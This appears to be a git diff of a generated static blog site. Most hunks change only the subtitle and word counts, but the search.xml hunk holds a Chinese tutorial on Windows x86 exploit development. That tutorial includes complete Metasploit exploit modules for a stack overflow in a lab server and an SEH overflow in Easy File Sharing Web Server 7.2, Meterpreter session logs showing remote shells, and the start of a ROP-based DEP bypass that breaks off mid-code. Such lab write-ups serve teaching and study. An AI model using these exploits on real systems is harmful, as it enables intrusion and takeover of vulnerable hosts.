diff --git a/categories/加密解密/index.html b/categories/加密解密/index.html
index aa19b9c4..0e0ada18 100644
--- a/categories/加密解密/index.html
+++ b/categories/加密解密/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -471,7 +471,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/categories/杂七杂八/index.html b/categories/杂七杂八/index.html
index ff8c214e..dc9159f2 100644
--- a/categories/杂七杂八/index.html
+++ b/categories/杂七杂八/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -471,7 +471,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/categories/理论学习/index.html b/categories/理论学习/index.html
index fb6365a5..a541508f 100644
--- a/categories/理论学习/index.html
+++ b/categories/理论学习/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -471,7 +471,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/categories/顶会论文/index.html b/categories/顶会论文/index.html
index e3d9297f..e501234d 100644
--- a/categories/顶会论文/index.html
+++ b/categories/顶会论文/index.html
@@ -156,7 +156,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -523,7 +523,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/index.html b/index.html
index 147e771e..8c56c91a 100644
--- a/index.html
+++ b/index.html
@@ -157,7 +157,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -409,7 +409,7 @@
                 </span>
                 
                 <span title="阅读时长">
-                  11 分钟
+                  12 分钟
                 </span>
               
             </div>
@@ -433,11 +433,12 @@
         
           
           这部分是对Window x86平台下的几个典型漏洞利用方式的介绍，从最基础的、没有开启任何保护的漏洞程序入手，然后开启GS，最后通过rop绕过DEP。
+
 0x00 漏洞利用开发简介（1）需要什么
 
 Immunity Debugger -Download
 Mona.py -Download
-Metasp
+Metas
           ...
           <!--noindex-->
           <div class="post-button text-center">
@@ -1313,7 +1314,7 @@ Metasp
                 </span>
                 
                 <span title="字数统计">
-                  5.8k 字
+                  6k 字
                 </span>
               
 
@@ -1327,7 +1328,7 @@ Metasp
                 </span>
                 
                 <span title="阅读时长">
-                  25 分钟
+                  27 分钟
                 </span>
               
             </div>
@@ -2326,7 +2327,7 @@ WinDbg
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/page/2/index.html b/page/2/index.html
index dd8d5fee..0fb637ed 100644
--- a/page/2/index.html
+++ b/page/2/index.html
@@ -157,7 +157,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -1916,7 +1916,7 @@ ettercap嗅探智能设备和网关之间的流量sudo ettercap -i ens33 -T -q
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/search.xml b/search.xml
index 11bde4de..79ce9c3a 100644
--- a/search.xml
+++ b/search.xml
@@ -8,7 +8,7 @@
       <link href="/2019/07/10/x86basic/"/>
       <url>/2019/07/10/x86basic/</url>
       
-        <content type="html"><![CDATA[<p>这部分是对Window x86平台下的几个典型漏洞利用方式的介绍，从最基础的、没有开启任何保护的漏洞程序入手，然后开启GS，最后通过rop绕过DEP。</p><h1 id="0x00-漏洞利用开发简介"><a href="#0x00-漏洞利用开发简介" class="headerlink" title="0x00 漏洞利用开发简介"></a>0x00 漏洞利用开发简介</h1><p>（1）需要什么</p><ul><li>Immunity Debugger -<a href="http://debugger.immunityinc.com/ID_register.py" target="_blank" rel="noopener">Download</a></li><li>Mona.py -<a href="https://github.com/corelan/mona" target="_blank" rel="noopener">Download</a></li><li>Metasploit框架-<a href="https://www.metasploit.com/" target="_blank" rel="noopener">下载</a></li><li>靶机–Windows XP sp3</li></ul><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562741903/%E6%8D%95%E8%8E%B7.png" alt></p><ul><li>函数调用与栈：调用、返回</li><li>寄存器与函数栈帧：ESP、EBP</li><li>函数栈帧：局部变量、栈帧状态值、函数返回地址</li><li>函数调用约定与相关指令：参数传递方式、参数入栈顺序、恢复堆栈平衡的操作</li></ul><p>（2）函数调用的汇编过程</p><ol><li><p>示例程序</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">charname[] = <span class="string">"1234567"</span>;</span><br><span class="line">voidfunc(<span class="keyword">int</span> a, <span class="keyword">int</span> b, <span class="keyword">int</span> c)</span><br><span class="line">&#123;</span><br><span class="line">    charbuf[<span class="number">8</span>];</span><br><span class="line">    <span class="built_in">strcpy</span>(buf, name);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>汇编过程</p></li></ol><ul><li>PUSH c, PUSH b, PUSH a</li><li>CALL address of func【保存返回地址；跳转】</li><li>MOV ebp, esp</li><li>PUSH ebp</li><li>SUB esp, 0x40</li><li>创建局部变量，4个字节为一组</li><li>do something</li><li>add esp, 0x40</li><li>pop ebp</li><li>RETN【弹出返回地址，跳转】</li></ul><ol start="3"><li>栈帧结构<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742079/%E6%8D%95%E8%8E%B71.png" alt></li></ol><h1 id="0x01-简单栈溢出"><a href="#0x01-简单栈溢出" class="headerlink" title="0x01 简单栈溢出"></a>0x01 简单栈溢出</h1><blockquote><p><strong>目标程序:</strong><br><a href="http://redstack.net/blog/static/uploads/2008/01/bof-server.c" target="_blank" rel="noopener">bof-server source code</a><br><a href="http://redstack.net/blog/wp-content/uploads/2008/01/bof-server.exe" target="_blank" rel="noopener">bof-server binary for Windows</a><br><strong>usage:</strong><br>服务端<br><code>bof-server.exe 4242</code><br>客户端<br><code>telnet localhost 4242</code><br><code>version</code><br><code>bof-server v0.01</code><br><code>quit</code></p></blockquote><h2 id="漏洞点"><a href="#漏洞点" class="headerlink" title="漏洞点"></a>漏洞点</h2><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742316/%E5%9B%BE%E7%89%871.png" alt></p><p><strong>产生崩溃</strong><br>将输出的1024个A发送给靶机程序<br><figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">python -c <span class="string">"print('A' * 1024)"</span></span><br><span class="line">telnet <span class="number">192.168</span><span class="number">.64</span><span class="number">.138</span> <span class="number">4242</span></span><br></pre></td></tr></table></figure></p><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742366/%E5%9B%BE%E7%89%872.png" alt></p><h2 id="关闭防御措施"><a href="#关闭防御措施" class="headerlink" title="关闭防御措施"></a>关闭防御措施</h2><p>使用<strong>PESecurity</strong>检查可执行文件本身的防御措施开启情况<br>注意设置：Set-ExecutionPolicyUnrestricted</p><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742444/%E5%9B%BE%E7%89%873.png" alt></p><p><strong>ASLR和DEP</strong><br>ASLR在xp下不用考虑，DEP可通过修改boot.ini中的nonexecute来完成（AlwaysOff、OptOut）<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742486/%E5%9B%BE%E7%89%874.png" alt></p><h2 id="整体的攻击流程："><a href="#整体的攻击流程：" class="headerlink" title="整体的攻击流程："></a>整体的攻击流程：</h2><ol><li>任意非00的指令覆盖buffer和EBP</li><li>从程序已经加载的dll中获取他们的jmp esp指令地址。</li><li>使用jmp esp的指令地址覆盖ReturnAddress</li><li>从下一行开始填充Shellcode<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742543/%E5%9B%BE%E7%89%875.png" alt></li></ol><h2 id="确定溢出点的位置"><a href="#确定溢出点的位置" class="headerlink" title="确定溢出点的位置"></a>确定溢出点的位置</h2><ol><li><p>生成字符序列 <strong>pattern_create.rb</strong><br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742622/%E5%9B%BE%E7%89%876.png" alt></p></li><li><p>发送给目标程序<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742623/%E5%9B%BE%E7%89%877.png" alt></p></li><li><p>计算偏移量 <strong>pattern_offset.rb</strong><br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742685/%E5%9B%BE%E7%89%878.png" alt></p></li><li><p>确定payload结构<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742686/%E5%9B%BE%E7%89%879.png" alt></p></li></ol><h2 id="寻找jmp-esp跳板"><a href="#寻找jmp-esp跳板" class="headerlink" title="寻找jmp esp跳板"></a>寻找jmp esp跳板</h2><ol><li>OD附加进程看一下服务器加载了哪些模块<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742794/%E5%9B%BE%E7%89%8710.png" alt></li><li>查找JMP ESP指令的地址<br>在这里选择了ws2_32.dll作为对象，通过Metasploit的msfbinscan进行搜索<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742793/%E5%9B%BE%E7%89%8711.png" alt></li></ol><h2 id="自动化攻击"><a href="#自动化攻击" class="headerlink" title="自动化攻击"></a>自动化攻击</h2><figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">require</span> <span class="string">'msf/core'</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Metasploit3</span> &lt; Msf::Exploit::<span class="title">Remote</span></span></span><br><span class="line">  Rank = NormalRanking</span><br><span class="line">  <span class="keyword">include</span> Msf::Exploit::Remote::Tcp</span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="keyword">def</span> <span class="title">initialize</span><span class="params">(info = &#123;&#125;)</span></span></span><br><span class="line">  <span class="keyword">super</span>(update_info(info,</span><br><span class="line">    <span class="string">'Name'</span> =&gt; <span class="string">'Stack Based Buffer Overflow Example'</span>,</span><br><span class="line">    <span class="string">'Description'</span> =&gt; <span class="string">%q&#123;</span></span><br><span class="line"><span class="string">          Stack Based Overflow Example Application Exploitation Module</span></span><br><span class="line"><span class="string">       &#125;</span>,</span><br><span class="line">    <span class="string">'Platform'</span> =&gt; <span class="string">'Windows'</span>,</span><br><span class="line">    <span class="string">'Author'</span> =&gt; <span class="string">'yanhan'</span>,</span><br><span class="line"></span><br><span class="line">    <span class="string">'Payload'</span> =&gt;</span><br><span class="line">         &#123;</span><br><span class="line">           <span class="string">'space'</span> =&gt; <span class="number">400</span>,</span><br><span class="line">                           <span class="string">'BadChars'</span> =&gt; <span class="string">"\x00\xff"</span></span><br><span class="line">                         &#125;,</span><br><span class="line">    <span class="string">'Targets'</span>  =&gt;</span><br><span class="line">         [</span><br><span class="line">             [</span><br><span class="line">      <span class="string">'Windows XP SP3'</span>,</span><br><span class="line">      &#123;<span class="string">'Ret'</span> =&gt; <span class="number">0x71a22b53</span>, <span class="string">'Offset'</span> =&gt; <span class="number">520</span>&#125;</span><br><span class="line">     ]</span><br><span class="line">         ],</span><br><span class="line">     <span class="string">'DisclosureDate'</span> =&gt; <span class="string">'2019-05-25'</span></span><br><span class="line">  ))</span><br><span class="line">  <span class="keyword">end</span></span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="keyword">def</span> <span class="title">exploit</span></span></span><br><span class="line">    connect</span><br><span class="line">    buf = make_nops(target[<span class="string">'Offset'</span>])</span><br><span class="line">    buf = buf + [target[<span class="string">'Ret'</span>]].pack(<span class="string">'V'</span>) + make_nops(<span class="number">20</span>) + payload.encoded</span><br><span class="line">    sock.put(buf)</span><br><span class="line">    handler</span><br><span class="line">    disconnect</span><br><span class="line">   <span class="keyword">end</span></span><br><span class="line"><span class="keyword">end</span></span><br></pre></td></tr></table></figure><figure class="highlight subunit"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">msf5 &gt; use exploit/windows/yanhan/bof_attack</span><br><span class="line">msf5 exploit(windows/yanhan/bof_attack) &gt; set rhosts 192.168.31.114</span><br><span class="line">rhosts =&gt; 192.168.31.114</span><br><span class="line">msf5 exploit(windows/yanhan/bof_attack) &gt; set rport 1000</span><br><span class="line">rport =&gt; 1000</span><br><span class="line">msf5 exploit(windows/yanhan/bof_attack) &gt; exploit</span><br><span class="line"></span><br><span class="line">[*] Started reverse TCP handler on 192.168.31.84:4444</span><br><span class="line">[*] Sending stage (179779 bytes) to 192.168.31.114</span><br><span class="line">[*] Meterpreter session 1 opened (192.168.31.84:4444 -&gt; 192.168.31.114:1062) at 2019<span class="string">-07</span><span class="string">-10</span> 16:38:51 <span class="string">+0800</span></span><br><span class="line"></span><br><span class="line">meterpreter &gt; ls</span><br><span class="line">Listing: C:\Documents and Settings\Administrator</span><br><span class="line">================================================</span><br><span class="line"></span><br><span class="line">Mode              Size     Type  Last modified              Name</span><br><span class="line">----              ----     ----  -------------              ----</span><br><span class="line">40555/r-xr-xr-x   0        dir   2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span>  Application Data</span><br><span class="line">40777/rwxrwxrwx   0        dir   2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span>  Cookies</span><br><span class="line">40555/r-xr-xr-x   0        dir   2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span>  Favorites</span><br><span class="line">40777/rwxrwxrwx   0        dir   2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span>  Local Settings</span><br><span class="line">40555/r-xr-xr-x   0        dir   2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span>  My Documents</span><br><span class="line">100666/rw-rw-rw-  1048576  fil   2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span>  NTUSER.DAT</span><br><span class="line">40777/rwxrwxrwx   0        dir   2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span>  NetHood</span><br><span class="line">40777/rwxrwxrwx   0        dir   2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span>  PrintHood</span><br><span class="line">40555/r-xr-xr-x   0        dir   2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span>  Recent</span><br><span class="line">40555/r-xr-xr-x   0        dir   2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span>  SendTo</span><br><span class="line">40777/rwxrwxrwx   0        dir   2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span>  Templates</span><br><span class="line">100777/rwxrwxrwx  26665    fil   2019<span class="string">-05</span><span class="string">-28</span> 14:59:10 <span class="string">+0800</span>  bof-server.exe</span><br><span class="line">100666/rw-rw-rw-  1024     fil   2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span>  ntuser.dat.LOG</span><br><span class="line">100666/rw-rw-rw-  178      fil   2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span>  ntuser.ini</span><br><span class="line">40777/rwxrwxrwx   0        dir   2019<span class="string">-05</span><span class="string">-29</span> 10:49:26 <span class="string">+0800</span>  vulnserver</span><br><span class="line">40555/r-xr-xr-x   0        dir   2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span>  「开始」菜单</span><br><span class="line">40777/rwxrwxrwx   0        dir   2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span>  桌面</span><br><span class="line"></span><br><span class="line">meterpreter &gt;</span><br></pre></td></tr></table></figure><h1 id="0x02-基于SEH的栈溢出"><a href="#0x02-基于SEH的栈溢出" class="headerlink" title="0x02 基于SEH的栈溢出"></a>0x02 基于SEH的栈溢出</h1><blockquote><p><strong>目标程序</strong> Easy File Sharing Web Server 7.2</p><p><strong>漏洞点</strong><br>在处理请求时存在漏洞——一个恶意的请求头部（HEAD或GET）就可以引起缓冲区溢出，从而改写SEH链的地址。</p><p><strong>利用seh</strong><br>填充物+nseh+ seh（pop popretn指令序列地址）+shellcode</p><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744120/11.png" alt></p></blockquote><h2 id="确定溢出点的位置-1"><a href="#确定溢出点的位置-1" class="headerlink" title="确定溢出点的位置"></a>确定溢出点的位置</h2><ol><li>生成字符序列<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">/opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create<span class="selector-class">.rb</span> -l <span class="number">10000</span> &gt; <span class="selector-tag">a</span>.txt</span><br><span class="line">python -c <span class="string">"print(' HTTP/1.0\r\n\r\n')"</span> &gt; <span class="selector-tag">b</span>.txt</span><br><span class="line">cat <span class="selector-tag">a</span><span class="selector-class">.txt</span> <span class="selector-tag">b</span><span class="selector-class">.txt</span> &gt; c.txt</span><br></pre></td></tr></table></figure></li></ol><p>删除cat造成的多余字符0x0a<br><figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">vim -bz.txt</span><br><span class="line"><span class="comment"># In Vim</span></span><br><span class="line"><span class="symbol">:%</span>!xxd</span><br><span class="line"><span class="comment"># After editing, use the instruction below to save</span></span><br><span class="line"><span class="symbol">:%</span>!xxd -r</span><br></pre></td></tr></table></figure></p><ol start="2"><li>构造SEH链</li></ol><ul><li>将Easy File Sharing Web Server 7.2加载到ImmunityDebugger中，并处于运行状态。</li><li>发送溢出字符序列</li><li>查看Easy File Sharing Web Server 7.2溢出地址<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744240/231.png" alt></li></ul><ol start="3"><li>计算偏移量<br>计算catch块偏移量&amp;计算下一条SEH记录偏移量</li></ol><h2 id="寻找PPR"><a href="#寻找PPR" class="headerlink" title="寻找PPR"></a>寻找PPR</h2><ol><li>使用mona寻找<br>需要POP/POP/RET指令的地址来载入下一条SEH记录的地址，并跳转到攻击载荷<figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="addition">!mona modules</span></span><br><span class="line"><span class="addition">!mona seh</span></span><br></pre></td></tr></table></figure></li></ol><h2 id="自动化攻击-1"><a href="#自动化攻击-1" class="headerlink" title="自动化攻击"></a>自动化攻击</h2><ol><li><p>编写攻击脚本</p><figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">require</span> <span class="string">'msf/core'</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">MetasploitModule</span> &lt; Msf::Exploit::<span class="title">Remote</span></span></span><br><span class="line">  Rank = NormalRanking</span><br><span class="line">  <span class="keyword">include</span> Msf::Exploit::Remote::Tcp</span><br><span class="line">  <span class="keyword">include</span> Msf::Exploit::Seh</span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="keyword">def</span> <span class="title">initialize</span><span class="params">(info = &#123;&#125;)</span></span></span><br><span class="line">    <span class="keyword">super</span>(update_info(info,</span><br><span class="line">      <span class="string">'Name'</span>            =&gt; <span class="string">'Easy File Sharing HTTP Server 7.2 SEH Overflow'</span>,</span><br><span class="line">      <span class="string">'Description'</span>     =&gt; <span class="string">%q&#123;</span></span><br><span class="line"><span class="string">        This Module Demonstrate SEH based overflow example</span></span><br><span class="line"><span class="string">      &#125;</span>,</span><br><span class="line">      <span class="string">'Author'</span>          =&gt; <span class="string">'yanhan'</span>,</span><br><span class="line"></span><br><span class="line">      <span class="string">'Payload'</span>         =&gt;</span><br><span class="line">        &#123;</span><br><span class="line">          <span class="string">'Space'</span>       =&gt; <span class="number">390</span>,</span><br><span class="line">          <span class="string">'BadChars'</span>    =&gt; <span class="string">"\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e"</span></span><br><span class="line">        &#125;,</span><br><span class="line">      <span class="string">'Platform'</span>      =&gt; <span class="string">'Windows'</span>,</span><br><span class="line">      <span class="string">'Targets'</span>       =&gt;</span><br><span class="line">          [</span><br><span class="line">               [</span><br><span class="line">                 <span class="string">'Easy File Sharing 7.2 HTTP'</span>,</span><br><span class="line">              &#123;</span><br><span class="line">                <span class="string">'Ret'</span>       =&gt; <span class="number">0x10022fd7</span>,</span><br><span class="line">                <span class="string">'Offset'</span>    =&gt; <span class="number">4061</span></span><br><span class="line">              &#125;</span><br><span class="line">               ]</span><br><span class="line">           ],</span><br><span class="line">      <span class="string">'DisclosureDate'</span>  =&gt; <span class="string">'2019-01-16'</span>,</span><br><span class="line">  ))</span><br><span class="line">  <span class="keyword">end</span></span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="keyword">def</span> <span class="title">exploit</span></span></span><br><span class="line">    connect</span><br><span class="line">    weapon = <span class="string">"HEAD "</span></span><br><span class="line">    weapon &lt;&lt; make_nops(target[<span class="string">'Offset'</span>])</span><br><span class="line">    weapon &lt;&lt; generate_seh_record(target[<span class="string">'Ret'</span>])</span><br><span class="line">    weapon &lt;&lt; make_nops(<span class="number">20</span>)</span><br><span class="line">    weapon &lt;&lt; payload.encoded</span><br><span class="line">    weapon &lt;&lt; <span class="string">" HTTP/1.0\r\n\r\n"</span></span><br><span class="line">    sock.put(weapon)</span><br><span class="line">    handler</span><br><span class="line">    disconnect</span><br><span class="line">   <span class="keyword">end</span></span><br><span class="line"><span class="keyword">end</span></span><br></pre></td></tr></table></figure></li><li><p>exploit</p><figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">msf5 &gt; use exploit/windows/yanhan/seh_attack</span><br><span class="line">msf5 exploit(windows/yanhan/seh_attack) &gt; <span class="keyword">set</span> rhosts <span class="comment">192.168.31.114</span></span><br><span class="line">rhosts <span class="comment">=&gt; 192.168.31.114</span></span><br><span class="line">msf5 <span class="comment">exploit(windows</span>/yanhan/<span class="comment">seh_attack) &gt; set rport 80</span></span><br><span class="line">rport <span class="comment">=&gt; 80</span></span><br><span class="line">msf5 <span class="comment">exploit(windows</span>/yanhan/<span class="comment">seh_attack) &gt; exploit</span></span><br><span class="line"></span><br><span class="line">[*] Started <span class="comment">reverse TCP handler on 192.168.31.84:4444</span></span><br><span class="line">[*] Exploit <span class="comment">completed, but no session was created.</span></span><br><span class="line">msf5 <span class="comment">exploit(windows</span>/yanhan/<span class="comment">seh_attack) &gt; set payload windows</span>/meterpreter/<span class="comment">bind_tcp</span></span><br><span class="line">payload <span class="comment">=&gt; windows</span>/meterpreter/<span class="comment">bind_tcp</span></span><br><span class="line">msf5 <span class="comment">exploit(windows</span>/yanhan/<span class="comment">seh_attack) &gt; exploit</span></span><br><span class="line"></span><br><span class="line">[*] Started <span class="comment">bind TCP handler against 192.168.31.114:4444</span></span><br><span class="line">[*] Sending <span class="comment">stage (179779 bytes) to 192.168.31.114</span></span><br><span class="line">[*] Meterpreter <span class="comment">session 1 opened (192.168.31.84:46601 -&gt; 192.168.31.114:4444) at 2019-07-10 16:43:47 +0800</span></span><br><span class="line"></span><br><span class="line">meterpreter <span class="comment">&gt; getuid</span></span><br><span class="line">Server <span class="comment">username: WHU-3E3EECEBFD1\Administrator</span></span><br></pre></td></tr></table></figure></li></ol><h1 id="0x03-绕过DEP"><a href="#0x03-绕过DEP" class="headerlink" title="0x03 绕过DEP"></a>0x03 绕过DEP</h1><blockquote><p><strong>目标程序</strong> <a href="http://www.thegreycorner.com/2010/12/introducing-vulnserver.html" target="_blank" rel="noopener">Introducing Vulnserver</a><br><strong>使用</strong> vulnserver.exe 6666<br><strong>漏洞点</strong> <img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744461/%E5%9B%BE%E7%89%8712.png" alt></p></blockquote><h2 id="设置DEP保护"><a href="#设置DEP保护" class="headerlink" title="设置DEP保护"></a>设置DEP保护</h2><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744518/%E6%8D%9511%E8%8E%B7.png" alt><br><em>构建ROP链来调用VirtualProtect()关闭DEP并执行Shellcode</em></p><h2 id="计算偏移量"><a href="#计算偏移量" class="headerlink" title="计算偏移量"></a>计算偏移量</h2><p><code>&#39;TRUN .&#39;+make_nops(target[&#39;Offset&#39;])</code><br>Immunity附加进程之后，在服务端发送3000个字符，计算偏移</p><h2 id="创建ROP链"><a href="#创建ROP链" class="headerlink" title="创建ROP链"></a>创建ROP链</h2><p><code>!mona rop -m *.dll -cp nonull</code><br><figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span 